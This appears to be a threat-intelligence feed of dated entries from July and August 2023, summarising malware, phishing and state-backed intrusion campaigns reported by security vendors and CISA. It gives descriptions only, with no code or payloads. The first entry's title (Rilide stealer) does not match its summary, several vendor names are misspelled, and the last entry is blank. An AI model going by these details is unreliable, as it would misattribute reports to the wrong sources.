https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-season-of-back-to-school-scams/
—
- Intel Source:
- Trustwave
- Intel Name:
- New_Rilide_Stealer_Version
- Date of Scan:
- 2023-08-04
- Impact:
- LOW
- Summary:
- Securelist researchers found new Emotet samples, a new loader dubbed “DarkGate”, and a new LokiBot infostealer campaign. They described all three in private reports, from which this post contains an excerpt.
—
- Intel Source:
- Microsoft
- Intel Name:
- Hackers_Sent_Phishing_Emails_Masquerading_as_Microsoft_Teams_Chats
- Date of Scan:
- 2023-08-03
- Impact:
- MEDIUM
- Summary:
- In “highly targeted social engineering attacks,” hackers within the Russian military utilized Microsoft Teams discussions as phishing baits. The IT giant announced on Wednesday that it has discovered a campaign by the well-known Russian hacker collective Midnight Blizzard, also known as NOBELIUM, Cozy Bear, or APT29. According to U.S. and U.K. law enforcement organizations, the group is a component of the Russian Federation’s Foreign Intelligence Service.
—
- Intel Source:
- Recorded Future
- Intel Name:
- Russian_APT_BlueCharlie_Swaps_Infrastructure_to_Evade_Detection
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- Researchers from Recorded Future have identified the latest campaign from BlueCharlie, the group completely switched up its infrastructure, creating nearly 100 new domains from which to perform credential harvesting and follow-on espionage attacks.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2023-0802.pdf
—
- Intel Source:
- Sentilone
- Intel Name:
- Illicit_Brand_Impersonation
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- Santilone researchers continually observe brands being impersonated for illicit use, including credential phishing and malware delivery. In their blog they shared examples of opportunistic and targeted threat actors impersonating trusted brands and they can make use of new tooling for the purposes of hunting and tracking them moving forward.
Source:
https://www.sentinelone.com/blog/illicit-brand-impersonation-a-threat-hunting-approach/
—
- Intel Source:
- ASEC
- Intel Name:
- Linux_Systems_Are_Affected_by_Reptile_Malware
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- ASEC has recently observed Reptile, an open-source Linux rootkit with powerful concealment features and Port Knocking capabilities. It examines real-world attacks, including those targeting Korean companies, and draws parallels to the Mélofée malware.
—
- Intel Source:
- ASEC
- Intel Name:
- Sliver_C2_malware_being_distributed
- Date of Scan:
- 2023-08-03
- Impact:
- LOW
- Summary:
- ASEC has recently observed similar malware from the past SparkRAT being distributed while being pretending as setup files for Korean VPN service providers and marketing program producers. Contrary the past cases where SparkRAT was used, Sliver C2 was used in the recent attacks and techniques to avoid detection were employed.
—
- Intel Source:
- CISA
- Intel Name:
- Attackers_Exploiting_Ivanti_EPMM_Vulnerabilities
- Date of Scan:
- 2023-08-02
- Impact:
- MEDIUM
- Summary:
- In response to the active exploitation of CVE-2023-35078 and CVE-2023-35081, the Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) have released a joint cybersecurity advisory. From at least April 2023 to July 2023, advanced persistent threat actors used CVE-2023-35078 as a zero-day exploit to collect data from a number of Norwegian enterprises as well as to access and compromise the network of a Norwegian government agency.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a
—
- Intel Source:
- Halcyon
- Intel Name:
- Ransomware_Command_and_Control_Providers_report
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- The Halcyon researchers shared their research that observed new techniques used to unmask yet another Ransomware Economy player that is speed up ransomware attacks and state-sponsored APT operations like Command-and-Control Providers (C2P) who sell services to threat actors while assuming a legal business profile. In their report, titled Cloudzy with a Chance of Ransomware, Halcyon showed a unique method for identifying C2P entities that can be used to forecast the pioneer to major ransomware campaigns and other advanced attacks. Halcyon also identifies two new, previously undisclosed ransomware affiliates Halcyon named them as Ghost Clown and Space Kook that currently deploy BlackBasta and Royal, respectively.
—
- Intel Source:
- Cado Security
- Intel Name:
- New_P2Pinfect_Malware_Campaign_Against_Redis_Servers_Detailed
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- Researchers from Cado Security Labs have just discovered a brand-new malware campaign that targets Redis data store deployments that are open to the general public. The malware, which was created in Rust and given the name “P2Pinfect” by the creators, functions as a botnet agent. An embedded Portable Executable (PE) and an additional ELF executable are both included in the sample that researchers analyzed, indicating cross-platform compatibility between Windows and Linux.
—
- Intel Source:
- Trustwave
- Intel Name:
- New_Variant_of_SkidMap_Targeting_Redis
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- Researchers from Trustwave examined the most recent logs from a honeypot in central Europe and discovered an intriguing entry that appeared again less than two weeks later. Only open Redis instances are targeted by SkidMap (also known as “NO AUTH”). They haven’t noticed brute-force attacks coming from the precise IP where the initial attack started.
—
- Intel Source:
- PaloAlto
- Intel Name:
- NodeStealer_2_0_The_Python_Version
- Date of Scan:
- 2023-08-02
- Impact:
- LOW
- Summary:
- Unit 42 researchers have recently discovered a previously unreported phishing campaign that distributed an infostealer equipped to fully take over Facebook business accounts. Facebook business accounts were targeted with a phishing lure offering tools such as spreadsheet templates for busines
Source:
https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/
—
- Intel Source:
- Cyble
- Intel Name:
- The_Cunning_XWorms_Multi_Staged_Attack
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- The XWorm malware uses a new multistage approach to deliver its payload utilizing LOLBins, according to an analysis by Cyble researchers.
Source:
https://cyble.com/blog/sneaky-xworm-uses-multistaged-attack/
—
- Intel Source:
- Proofpoint
- Intel Name:
- WikiLoader_Favors_Complex_Evasion
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- WikiLoader is a new piece of malware that Proofpoint researchers have discovered. It was originally discovered in December 2022 being delivered by TA544, an attacker who frequently targets Italian enterprises with Ursnif malware. They also noticed numerous succeeding initiatives, the majority of which had Italian groups as their target.
Source:
https://www.proofpoint.com/us/blog/threat-insight/out-sandbox-wikiloader-digs-sophisticated-evasion
—
- Intel Source:
- Team-Cymru
- Intel Name:
- The_IcedID_BackConnect_Protocol_Internals
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- Researchers from Team-Cymru have updated their investigation and monitoring of the infrastructure linked to IcedID’s BackConnect protocol.
Source:
https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol-part-2
—
- Intel Source:
- Avast
- Intel Name:
- The_Unknown_Risks_of_Dot_Zip_Domains
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- Cybercriminals have begun using.zip domains to trick people into thinking they are downloadable files rather than URLs, according to Avast researchers. According to research, one-third of the top 30.zip domains blacklisted by threat detection engines misuse the names of well-known IT firms like Microsoft, Google, Amazon, and Paypal to deceive users into thinking they are files from reputable businesses.
Source:
https://decoded.avast.io/matejkrcma/unpacking-the-threats-within-the-hidden-dangers-of-zip-domains/
—
- Intel Source:
- PaloAlto
- Intel Name:
- URLs_That_Deliver_Ransomware
- Date of Scan:
- 2023-08-01
- Impact:
- LOW
- Summary:
- Researchers from Palo Alto have seen that threat actors are increasingly using URLs to deliver ransomware as they look for new ways to get their inventions past victims’ defenses. Additionally, they are utilizing more dynamic behaviors to spread their malware. Threat actors frequently switch hostnames, paths, filenames, or a combination of all three to disperse ransomware, in addition to following the tried-and-true method of deploying polymorphic variants of their ransomware.
Source:
https://unit42.paloaltonetworks.com/url-delivered-ransomware/#post-129339-_cfw3vjr99swz
—
- Intel Source:
- CISA
- Intel Name:
- v2_SUBMARINE_Backdoor
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- The US Department of Homeland Security (CISA) has released a report on a new type of backdoor malware, which could be used by hackers to gain access to a network of secure email addresses. CISA obtained seven malware samples related to a novel backdoor CISA has named SUBMARINE. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting certain versions 5.1.3.001 – 9.2.0.006 of Barracuda Email Security Gateway (ESG).
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-209a
—
- Intel Source:
- Bitdefender
- Intel Name:
- Threat_Actors_Abusing_the_Ad_Network
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- A threat actor with previous roots in cybercrime has shifted its initial access techniques to search engine advertisements to hijack searches for business applications such as AnyDesk, WinSCP, Cisco AnyConnect, Slack, TreeSize and potentially more. Bitdefender research showed that the actor(s) has successfully used this type of attack since late May 2023. Based on their threat insights, attackers seem to exclusively focus on North America. Until now, we have identified six target organizations in the US and one in Canada.
—
- Intel Source:
- Dr. Web
- Intel Name:
- Fruity_Trojan_Downloaders_Infect_Windows_Systems_in_Multiple_Stages
- Date of Scan:
- 2023-07-31
- Impact:
- LOW
- Summary:
- Dr.Web researchers have observed that threat actors are creating fake websites hosting trojanized software installers to trick unsuspecting users into downloading a downloader malware called Fruity with the goal of installing remote trojans tools like Remcos RAT.
—
- Intel Source:
- CISA
- Intel Name:
- CISA_Analyses_Report_v1_Exploit_Payload_Backdoor
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- CISA obtained 14 malware samples comprised of Barracuda exploit payloads and reverse shell backdoors. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG). The payload triggers a command injection (exploiting CVE-2023-2868), leading to dropping and execution of reverse shells on the ESG appliance. The reverse shells establish backdoor communications via OpenSSL with threat actor command and control (C2) servers. The actors delivered this payload to the victim via a phishing email with a malicious .tar attachment.
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-209c
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- STARK_MULE_Targeting_Koreans_With_US_Military_Themed_Document_Lures
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- Securonix researchers have detected an ongoing cyber assault campaign that is targeting Korean-speaking people by using document lures with American military themes to fool them into launching malware on compromised systems.
—
- Intel Source:
- CISA
- Intel Name:
- SEASPY_Backdoor
- Date of Scan:
- 2023-07-31
- Impact:
- MEDIUM
- Summary:
- CISA obtained two SEASPY malware samples. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG). SEASPY is a persistent and passive backdoor that masquerades as a legitimate Barracuda service “BarracudaMailService” that allows the threat actors to execute arbitrary commands on the ESG appliance.
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-209b
—
- Intel Source:
- Blackberry
- Intel Name:
- Behavioral_detection_tips_for_the_RomCom_campaign
- Date of Scan:
- 2023-07-28
- Impact:
- MEDIUM
- Summary:
- This article provides a technical analysis of the RomCom threat group, which is targeting politicians in Ukraine and U.S.-based healthcare organizations. It outlines process activity, IoCs, and Sigma rules to detect malicious behavior, such as the execution of a file from the Temp folder with a specific command line, and the use of COM objects to establish system persistence.
Source:
https://blogs.blackberry.com/en/2023/07/decoding-romcom-behaviors-and-opportunities-for-detection
—
- Intel Source:
- Recorded Future
- Intel Name:
- BlueBravo_Attacks_European_Diplomatic_Entities
- Date of Scan:
- 2023-07-28
- Impact:
- MEDIUM
- Summary:
- In order to deliver a new backdoor named GraphicalProton, the Russian nation-state actor known as BlueBravo has been detected targeting diplomatic institutions around Eastern Europe. This illustrates the threat’s ongoing evolution. The use of lawful internet services (LIS) for command-and-control (C2) obfuscation is a defining feature of the phishing campaign.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf
—
- Intel Source:
- Sophos
- Intel Name:
- A_New_Malicious_Campaign_Distributing_IT_Tools
- Date of Scan:
- 2023-07-28
- Impact:
- LOW
- Summary:
- Researchers from Sophos have discovered a new malvertising campaign that targets users looking for IT tools like AnyDesk, Cisco AnyConnect VPN, and WinSCP by using ads on Google Search and Bing. This campaign attempts to trick users into downloading trojanized installers in order to access corporate networks and possibly launch future ransomware attacks.
Source:
https://news.sophos.com/en-us/2023/07/26/into-the-tank-with-nitrogen/
—
- Intel Source:
- Sophos
- Intel Name:
- The_discover_of_apps_targeting_Iranian_bank_customers
- Date of Scan:
- 2023-07-28
- Impact:
- LOW
- Summary:
- Sophos X-Ops researchers discovered malicious apps targeting Iranian banks, which collect internet banking login credentials and credit card details, and have capabilities such as hiding icons and intercepting SMS messages. The threat actors used Firebase as a C2 mechanism and leveraged legitimate domains for C2 servers. The malware also searches for other banking, payment, and cryptocurrency apps, and the certificate used to sign the malicious apps was previously used by an IT consulting and development firm in Malaysia. The malicious apps request permissions to read SMS messages and urge users to grant them.
Source:
https://news.sophos.com/en-us/2023/07/27/uncovering-an-iranian-mobile-malware-campaign/
—
- Intel Source:
- GitHub Blog
- Intel Name:
- Jade_Sleet_Storm_0954_Social_Engineering_Campaign
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- GitHub has observed a Jade Sleet social engineering campaign which targets employees of technology firms, those who are connected to the blockchain, cryptocurrency, online gambling, and cybersecurity sectors. Jade Sleet (Storm-0954) is an activity group originally from North Korea and specializes in targeting cryptocurrency-related organizations. They utilize a range of tactics lke the development of applications that look like legitimate cryptocurrency apps, to spread their attacks. Jade Sleet has used the multi-platform targeted malware framework (MATA) and Electron frameworks to create implants for both Microsoft Windows and Mac-based systems.
—
- Intel Source:
- ICS CERT
- Intel Name:
- Attack_Tactics_Against_Industrial_Organizations
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Researchers from Kaspersky ICS CERT have looked at a number of assaults on commercial targets in Eastern Europe. The attackers’ goal in the attacks was to create an ongoing conduit for data exfiltration, including data from air-gapped systems. Based on the commonalities between these operations and other efforts that have been previously studied (such as ExCone and DexCone), including the use of FourteenHi variants, particular TTPs, and the scale of the attack.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Diving_Deep_into_Mallox_Ransomware
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- Unit 42 researchers have observed an uptick of Mallox ransomware activities with an increase of almost 174% compared to the previous year exploiting MS-SQL servers to distribute the ransomware. Mallox (aka TargetCompany, FARGO and Tohnichi) is a ransomware strain that targets Microsoft Windows systems. It has been active since June 2021, and is notable for exploiting unsecured MS-SQL servers as a penetration vector to compromise victims’ networks.
Source:
https://unit42.paloaltonetworks.com/mallox-ransomware/
—
- Intel Source:
- Microsoft
- Intel Name:
- The_Investigation_of_Cloud_Compute_Resource_Abuse
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Microsoft researchers have observed an attack that is targeting organizations that incurred more than $300,000 in computing fees due to cryptojacking attacks
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Targeting_Developers_via_Trojanized_MS_Visual_Studio
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Cyble researchers have uncovered a deceitful installer masquerading as an authentic Microsoft Visual Studio installer delivering a Cookie Stealer. This stealer is specifically designed to infiltrate and extract sensitive information stored in browser cookies, allowing attackers to compromise user accounts and invade privacy.
Source:
https://blog.cyble.com/2023/07/25/threat-actor-targeting-developers-via-trojanized-ms-visual-studio/
—
- Intel Source:
- Trellix
- Intel Name:
- Exploiting_of_the_search_ms_URI_Protocol_Handler
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- This article discusses the use of malicious payloads, such as AsyncRAT and Remcos RAT, by attackers to gain remote control over an infected system. It also covers the use of the “search” / “search-ms” URI protocol handler to launch attacks using a variety of file types, and how to disable this protocol handler. Additionally, it provides configuration information for AsyncRAT, including two IP addresses, six ports, a default botnet, a version number, and various settings.
Source:
https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html
—
- Intel Source:
- ASEC
- Intel Name:
- PurpleFox_Loader_Distributing_via_MS_SQL_Server
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the PurpleFox malware being installed on poorly managed MS-SQL servers. PurpleFox is a Loader that downloads additional malware and is known to mainly install CoinMiners.
—
- Intel Source:
- Zscaler
- Intel Name:
- In_depth_Campaign_Analysis_of_QakBot
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have conducted in-depth investigations to uncover the various attack chains employed by Qakbot. In this research, they delve into the depths of Qakbot, conducting a comprehensive technical analysis to understand its behavior, attack vectors, and distribution methods.
—
- Intel Source:
- Sygnia
- Intel Name:
- Casbaneiro_Infection_Chain_is_Back
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Sygnia researchers have observed that threat actors behind the Casbaneiro campaign are still active to this day, with some changes over the years in their attack chain, C2 infrastructure, and TTPs. The threat actors are still making effective use of spear-phishing attack to initiate their infection chain, and still appear to be focused on Latin American targets.
Source:
https://blog.sygnia.co/breaking-down-casbaneiro-infection-chain-part2
—
- Intel Source:
- Splunk
- Intel Name:
- The_Analysis_of_Amadey_Threat
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- The Amadey Trojan Stealer, an active and prominent malware, first emerged on the cybersecurity landscape in 2018 and has maintained a persistent botnet infrastructure ever since. Several campaigns have used this malware.
Source:
https://www.splunk.com/en_us/blog/security/amadey-threat-analysis-and-detections.html
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_Threat_Group_Attacking_Windows_Servers
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have discovered that Lazarus, a threat group deemed to be nationally funded, is attacking Windows Internet Information Service (IIS) web servers and using them as distribution points for their malware.
—
- Intel Source:
- Cyfirma
- Intel Name:
- A_Deceptive_and_Evolving_Malware_Tool
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- Cyfirma has identified a new threat in the cybersecurity landscape – Attacker-Crypter. This powerful tool allows cybercriminals to encrypt, obfuscate, and manipulate malicious code, evading detection by security tools and antivirus software. The freely available tool offers various features to enhance malware capabilities, including process injection, debugger evasion, and network communication.
—
- Intel Source:
- Aquasec
- Intel Name:
- Tomcat_attacked_by_Mirai_Malware_and_beyond
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- This article discusses the misconfiguration of Apache Tomcat, the impact of the malware ‘l4sd4sx64’, and the prevalence of Apache Tomcat in cloud, big data, and website development. It also provides an analysis of the attacks against Tomcat server honeypots over a two-year period, including the detection of a web shell hidden in a WAR file, the execution of a shell script, and the execution of the Mirai malware.
Source:
https://blog.aquasec.com/tomcat-under-attack-investigating-the-mirai-malware
—
- Intel Source:
- Mandiant
- Intel Name:
- The_Deep_Investigation_of_JumpCloud_System_Breach
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers have investigated the JumpCloud system breach and its impact on customers. Mandiant attributed these intrusions to UNC4899, a Democratic People’s Republic of Korea (DPRK)-nexus actor, with a history of targeting companies within the cryptocurrency vertical.
Source:
https://www.mandiant.com/resources/blog/north-korea-supply-chain
—
- Intel Source:
- Checkmarx
- Intel Name:
- Targeted_Open_Source_Software_Supply_Chain_Attacks_on_Banking_Sector
- Date of Scan:
- 2023-07-27
- Impact:
- LOW
- Summary:
- The banking sector is facing targeted open-source software supply chain attacks. Malicious actors exploit vulnerabilities in open-source packages, utilizing advanced techniques and deceptive tactics. Traditional controls fall short, necessitating proactive security measures throughout the Software Development Lifecycle (SDLC). Collaboration is key to strengthen defenses against these evolving threats. Checkmarx’s Supply Chain Intelligence offers protection and ongoing tracking.
Source:
https://checkmarx.com/blog/first-known-targeted-oss-supply-chain-attacks-against-the-banking-sector/
—
- Intel Source:
- Fortinet
- Intel Name:
- Cl0p_Ransomware_Financially_Motivated_Menace_Exploiting_Critical_Vulnerabilities
- Date of Scan:
- 2023-07-27
- Impact:
- MEDIUM
- Summary:
- Cl0p ransomware, operated by the FIN11 threat group, has been a persistent and financially motivated menace since early 2019. This malicious software targets organizations in North America and Europe, encrypting files and exfiltrating sensitive data. Recent attacks have exploited critical vulnerabilities in software, including the MOVEit Transfer SQL injection flaw. The ransom group demands payment in exchange for file decryption and to prevent the public exposure of stolen information
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-cl0p
—
- Intel Source:
- Proofpoint
- Intel Name:
- Scammers_Targeting_Universities_With_Bioscience_Lures
- Date of Scan:
- 2023-07-26
- Impact:
- LOW
- Summary:
- Researchers from Proofpoint have seen a campaign that targets university students in North America in late May 2023 using a variety of email lures with job-related themes. The emails claimed to be from several different organizations, the bulk of which were involved in the biosciences, healthcare, and biotechnology, as well as a few other unrelated ones. The operation went on until June 2023.
—
- Intel Source:
- Fortinet
- Intel Name:
- Zyxel_Vulnerability_Targeted_by_DDoS_Botnets
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- Researchers from FortiGuard have discovered the spread of many DDoS botnets that are taking use of the Zyxel vulnerability (CVE-2023-28771). It is possible for an unauthorized attacker to execute arbitrary code by sending a specially designed packet to the targeted device, which is how this vulnerability is defined by a command injection bug impacting several firewall models.
Source:
https://www.fortinet.com/blog/threat-research/ddos-botnets-target-zyxel-vulnerability-cve-2023-28771
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_Rusty_peer_to_Peer_self_Replicating_worm_Called_P2PInfect
- Date of Scan:
- 2023-07-26
- Impact:
- LOW
- Summary:
- Cloud researchers at Unit 42 have found a fresh peer-to-peer (P2P) worm that they named P2PInfect. This worm is capable of cross-platform infections and is written in the highly scalable and cloud-friendly programming language Rust. It targets Redis, a well-known open-source database application that is frequently utilized in cloud environments.
Source:
https://unit42.paloaltonetworks.com/peer-to-peer-worm-p2pinfect/
—
- Intel Source:
- Cyfirma
- Intel Name:
- Hackers_Behind_Big_Head_and_Poop69_Ransomware_Are_DEV0970_Storm_0970
- Date of Scan:
- 2023-07-26
- Impact:
- LOW
- Summary:
- CYFIRMA research team have observed Poop69 ransomware appearing in the wild, and shortly after that, another ransomware named BIG HEAD emerged, thought to originate from the same threat actor, which has become popular recently due to its fake Windows update method.
—
- Intel Source:
- Avast
- Intel Name:
- The_Dangers_of_Downloading_Illegal_Software_and_the_Hidden_AutoHotkey_Script
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- In a recent rise in malware activity, malicious AutoHotkey scripts that started the HotRat virus on victims’ PCs were bundled with illicit software, according to Avast researchers. This malware spreads via open repositories, with URLs being shared on social media and online discussion boards.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Spearphishing_Campaign_Targeting_Zimbra_Webmail_Portals_of_Government_Organizations
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- Researchers at EclecticIQ have discovered a spearphishing effort that uses vulnerable Zimbra and Roundcube email servers to target governmental institutions. The effort began in January 2023 and has primarily targeted Ukrainian government organizations, however it has also targeted Spain, Indonesia, and France.
—
- Intel Source:
- Sentilone
- Intel Name:
- JumpCloud_Intrusion_linked_to_North_Korean_APT_Activity
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- Sentilone shared the details after investigation and attributed this attack to an unnamed “sophisticated nation-state sponsored threat actor”. Additionally, there are updated IOCs released and researchers associated the cluster of threat activity to a North Korean state sponsored APT. The IOCs are linked to a wide variety of activity that Sentilone attributes to DPRK, overall centric to the supply chain targeting approach seen in previous campaigns.
—
- Intel Source:
- HP Labs
- Intel Name:
- Cybercriminals_Using_Ads_to_Spread_IcedID_and_Infostealers
- Date of Scan:
- 2023-07-25
- Impact:
- MEDIUM
- Summary:
- Researchers from HP Labs have observed two major malware campaigns delivering Vidar Stealer and IcedID, both of which use malvertising and imitate well-known software. Also, seen other families distributed using this method, including BatLoader and Rhadamanthys Stealer, indicating the growing popularity of this delivery mechanism among threat actors.
Source:
https://threatresearch.ext.hp.com/adverts-mimicking-popular-software-leads-to-malware/?web_view=true
—
- Intel Source:
- JPCERT/CC
- Intel Name:
- DangerousPasswords_Python_and_Nodejs_Malware_Across_Platforms
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
- JPCERT/CC has shared about DangerousPassword, a targeted attack group, is targeting developers of cryptocurrency exchange businesses on Windows, macOS, and Linux environments. They use Python and Node.js malware to infect systems. The malware downloads and executes MSI files (Windows) and Python files (macOS, Linux) from external sources, communicating with a C2 server every minute.
Source:
https://blogs.jpcert.or.jp/en/2023/07/dangerouspassword_dev.html
—
- Intel Source:
- CERT-UA
- Intel Name:
- Turla_Attacks_Using_CAPIBAR_and_KAZUAR_Malware
- Date of Scan:
- 2023-07-25
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have discovered that in addition to the use of XSLT (Extensible Stylesheet Language Transformations) and COM-hijacking, the specificity of CAPIBAR is the presence of a server part, which is typically installed on infected MS Exchange servers in the form of a MOF (Managed Object Format) file using the Desired State Configuration (DCS) PowerShell tool, effectively converting a legitimate server into a malware control center.
—
- Intel Source:
- Securilist
- Intel Name:
- Outlook_Vulnerability_and_Clever_Attacker_Tactics
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
- Securilist shared retheir analyses CVE-2023-23397 vulnerability in Microsoft Outlook for Windows allowed attackers to leak Net-NTLMv2 hashes by sending malicious objects. Samples exploiting this flaw targeted various entities from March 2022 to March 2023. Attackers used compromised ISP routers for hosting fake SMB servers.
Source:
https://securelist.com/analysis-of-attack-samples-exploiting-cve-2023-23397/110202/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- New_Campaign_Distributing_NetSupport_RAT_Through_Fake_Browser_Updates
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
- Researchers from Malwarebytes have observed a new campaign called FakeSG is distributing the NetSupport RAT through hacked WordPress websites. It uses fake browser update templates to deceive users. The payload is delivered via Internet shortcuts or zipped downloads.
—
- Intel Source:
- Fotinet
- Intel Name:
- Threat_Actors_Embrace_ZIP_Domains_in_Deceptive_Attacks
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
- FortiGate researchers have observed new ‘.ZIP’ Top-Level Domain (TLD) to launch sophisticated phishing attacks. These domains can trick users into thinking they are downloading files when they’re actually visiting malicious websites.
Source:
https://www.fortinet.com/blog/industry-trends/threat-actors-add-zip-domains-to-phishing-arsenals
—
- Intel Source:
- Checkpoint
- Intel Name:
- BundleBot_A_Stealthy_Threat_Abusing_Self_Contained_Dotnet_Format
- Date of Scan:
- 2023-07-25
- Impact:
- MEDIUM
- Summary:
- Check Point Research (CPR) conducted an analysis of a new malware strain called BundleBot, which is spreading covertly. BundleBot uses the dotnet bundle (single-file), self-contained format, making static detection challenging. The malware is commonly distributed via Facebook Ads and compromised accounts, masquerading as legitimate program utilities, AI tools, and games.
Source:
https://research.checkpoint.com/2023/byos-bundle-your-own-stealer/
—
- Intel Source:
- Permiso
- Intel Name:
- Agile_Approach_to_Mass_Cloud_Credential_Harvesting_and_Crypto_Mining_Sprints_Ahead
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Researchers from Permiso have observed Attackers are using an agile approach for mass cloud credential harvesting and crypto mining. They developed and deployed incremental iterations of their malware, targeting multiple cloud services. The campaign includes multi-cloud support, possible German-speaking actors, and hosting on Nice VPS.
—
- Intel Source:
- Symantec
- Intel Name:
- Modified_Sardonic_Backdoor_by_FIN8_Group
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Symantec researchers have found evidence of the financially motivated threat actor known as FIN8 employing a “revamped” variation of the Sardonic backdoor to spread the BlackCat ransomware.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/Syssphinx-FIN8-backdoor
—
- Intel Source:
- Sonatype
- Intel Name:
- NullRAT_InfoStealer_Targeting_PyPI_Package_for_Windows
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Sonatype’s automated malware detection systems discovered sonatype-2023-2950, a malicious PyPI package with the name “feur,” which has since been taken down.
—
- Intel Source:
- Cofense
- Intel Name:
- The_Use_of_HTML_Attachments_in_Phishing_Campaigns_Has_Increased
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Researchers from Cofense have observed developments in the phishing and email security scene. The use of HTML attachments in dangerous phishing attempts has increased significantly, by 168% and 450%, respectively, compared to both Q1 and Q2 of the preceding two years.
Source:
https://cofense.com/blog/html-attachments-used-in-malicious-phishing-campaigns/
—
- Intel Source:
- Rapid7
- Intel Name:
- Exploiting_Several_Adobe_ColdFusion_Vulnerabilities_Actively
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Researchers from Rapid7 have discovered that criminals are actively taking advantage of two ColdFusion flaws to circumvent authentication, remotely execute commands, and install webshells on vulnerable servers. Threat actors are combining exploits for the critical remote code execution vulnerability CVE-2023-38203 and the access control bypass vulnerability CVE-2023-29298.
—
- Intel Source:
- Microsoft
- Intel Name:
- The_deeper_details_of_Storm_0558_techniques_for_unauthorized_access
- Date of Scan:
- 2023-07-23
- Impact:
- LOW
- Summary:
- Earlier this month, Microsoft shared detailed information about a malicious campaign by a threat actor Storm-0558 that targeted customer email. Microsoft continued their investigation into this incident and deployed defense in depth to harden all systems involved, additionally they are providing their deeper analysis of the observed actor techniques for obtaining unauthorized access to email data, tools, and unique infrastructure characteristics.
—
- Intel Source:
- Netscope
- Intel Name:
- AWS_Amplify_Hosted_Phishing_Campaigns
- Date of Scan:
- 2023-07-23
- Impact:
- LOW
- Summary:
- Last couple months, Netskope Threat Labs researchers observed an increase in traffic to phishing pages hosted in AWS Amplify. These attacks have been targeting victims across different segments, led by the technology and finance verticals.
Source:
https://www.netskope.com/de/blog/aws-amplify-hosted-phishing-campaigns-abusing-telegram-static-forms
—
- Intel Source:
- Bleeding Computer, Jumpcloud
- Intel Name:
- JumpCloud_had_a_breach_by_state_backed_APT_hacking_group
- Date of Scan:
- 2023-07-23
- Impact:
- MEDIUM
- Summary:
